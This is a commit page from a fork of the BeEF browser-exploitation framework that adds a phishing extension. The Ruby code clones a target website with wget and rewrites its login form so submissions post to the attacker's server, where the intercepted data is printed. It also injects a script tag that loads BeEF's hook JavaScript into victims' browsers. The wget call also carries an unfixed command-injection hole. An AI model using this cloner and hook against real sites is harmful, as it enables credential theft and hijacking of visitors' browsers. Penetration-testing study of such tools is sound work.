Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Social Eng. extension: added basic structure and web cloner

Browse Source
This commit is contained in:
antisnatchor
2012-08-27 10:28:03 +01:00
parent 42c348f3f2
commit 558ca03ef6
5 changed files with 228 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
.gitignore vendored
View File

@@ -1,3 +1,4 @@
beef.db
test/msf-test
custom-config.yaml
custom-config.yaml
extensions/social_engineering/web_cloner/cloned_pages

24
extensions/social_engineering/config.yaml Normal file
View File

@@ -0,0 +1,24 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
extension:
social_engineering:
enable: true
name: 'Social Engineering'
authors: ["antisnatchor"]
web_cloner:
add_beef_hook: true
user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2"

31
extensions/social_engineering/extension.rb Normal file
View File

@@ -0,0 +1,31 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module SocialEngineering
extend BeEF::API::Extension
@short_name = 'social_engineering'
@full_name = 'Social Engineering'
@description = 'Phishing attacks for your pleasure: web page cloner (POST interceptor and BeEF goodness), highly configurable mass mailer, etc.'
end
end
end
require 'extensions/social_engineering/web_cloner/web_cloner'
require 'extensions/social_engineering/web_cloner/interceptor'

56
extensions/social_engineering/web_cloner/interceptor.rb Normal file
View File

@@ -0,0 +1,56 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module SocialEngineering
class Interceptor < Sinatra::Base
def initialize(file_path)
super
@config = BeEF::Core::Configuration.instance
@cloned_page = ""
File.open(file_path,'r').each do |line|
@cloned_page += line
end
end
# intercept GET
get "/" do
print_info "GET request"
@cloned_page
end
# intercept POST
# the 'action' attribute of the 'form' element is modified to the URI /
# in this way the request can be intercepted
post "/" do
print_info "POST request"
request.body.rewind
data = request.body.read
print_info "Intercepted data:"
print_info data
#todo: do a GET request on the target website, retrieve the respone headers and check if X-Frame-Options is present
#todo: or framebusting is present. If is not present, open the original URL in an iFrame, otherwise redirect the user
#todo: to the original page
end
end
end
end
end

115
extensions/social_engineering/web_cloner/web_cloner.rb Normal file
View File

@@ -0,0 +1,115 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module SocialEngineering
class WebCloner
include Singleton
def initialize
@http_server = BeEF::Core::Server.instance
@config = BeEF::Core::Configuration.instance
@cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
end
def clone_page(url)
#todo see web_cloner.rb, work perfectly
# output.html and output2.html (the one with the form action modified to /)
# must be stored in cloned_pages
print_info "Cloning page at URL #{url}"
uri = URI(url)
#output = url.split("/").last #todo test if http://google.com/ produces an error
output = uri.host
output_mod = "#{output}_mod"
user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
#todo: prevent Command Injection
wget = "wget '#{url}' -O #{@cloned_pages_dir + output} --no-check-certificate -c -k -U '#{user_agent}'"
IO.popen(wget.to_s) { |f| @result = f.gets }
print_debug @result
#todo, also check if the URL is valid with:
#unless (url =~ URI::regexp).nil?
# # Correct URL
#end
#todo: this should be the good way to prevent command injection, because the shell is not open.
#todo: there are issues: Scheme missing when calling wget
#wget_path = "wget"
#env = {}
#args = %W['#{url}' -O #{output} --no-check-certificate -c -k -U #{user_agent}]
#IO.popen([env, wget_path, *args], 'r+') { |f| @result = f.gets }
#if !File.writable?(File.basename(@cloned_pages_dir + output_mod))
# print_info "Cannot write to file..."
# IO.popen("chmod 777 #{@cloned_pages_dir}") { |f| @result = f.gets }
# sleep 2
#end
File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
# Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
if line.include?("<form ")
line_attrs = line.split(" ")
count = 0
#probably doable also with map!
line_attrs.each do |attr|
if attr.include? "action=\""
print_info "Form action found."
break
end
count += 1
end
line_attrs[count] = "action=\"/#{output}\""
mod_form = line_attrs.join(" ")
print_info "Form action value changed to / in order to be intercepted."
out_file.print mod_form
# Add the BeEF hook
elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
out_file.print add_beef_hook(line)
print_info "Added BeEF hook."
else
out_file.print line
end
end
end
print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
@http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path))
print_info "Mounting cloned page on URL #{output}"
@http_server.remap
end
private
# Replace </head> with <BeEF_hook></head>
def add_beef_hook(line)
host = @config.get('beef.http.host')
port = @config.get('beef.http.port')
js = @config.get('beef.http.hook_file')
hook = "http://#{host}:#{port}#{js}"
line.gsub!("</head>","<script type=\"text/javascript\" src=\"#{hook}\"></script>\n</head>")
line
end
end
end
end
end